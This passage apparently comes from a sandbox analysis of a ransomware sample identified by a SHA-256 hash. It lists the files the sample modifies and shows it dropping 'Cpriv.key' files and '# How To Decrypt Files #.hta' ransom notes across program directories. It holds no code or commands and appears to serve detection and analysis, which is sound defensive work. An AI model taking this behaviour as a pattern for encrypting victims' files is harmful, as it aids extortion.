Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FORM.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099183.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00114_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSPUB_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\play-background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304861.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\TimeCard.xltx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_right_mouseover.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_hail.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Temp\GUM3C25.tmp\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.SF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0075478.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\he\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0211981.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)grayStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsita.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BOLDSTRI\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01130_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195428.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301432.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_sv.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21343_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21338_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\tab_off.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Shades of Blue.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\ConvertFromCheckpoint.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.WIH de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Synchronization Services\ADO.NET\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Maroon.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_glass_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0285698.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Waitcursor.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01356_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01298_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\LABEL.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215210.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00914_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\Install\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCOUPON.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\sv.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\POWERPNT_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIconSubpi.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\44.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185798.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Solstice.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0234266.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18249_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\9.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\msadox28.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00459_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0212661.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_top.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_hail.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\weblink.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232395.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\msadc\adcvbs.inc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ADVZIP.DIC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CANYON\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186362.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Visualizations\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00130_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME37.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BIZCARD.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\CURRENCY.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01060_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01746_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10290_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR42F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\3082\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.JP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\fonts\TwemojiMozilla.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\26.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SATIN\SATIN.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CARBN_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\redStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\SETLANG_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\GIFT.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00965_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Policies\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00458_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGAD.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\TextConv\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_ring_docked.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08868_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDRESTL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0285750.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\PRODIGY.NET.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office32.en-us\SETUP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BOLDSTRI\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\16-on-black.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program 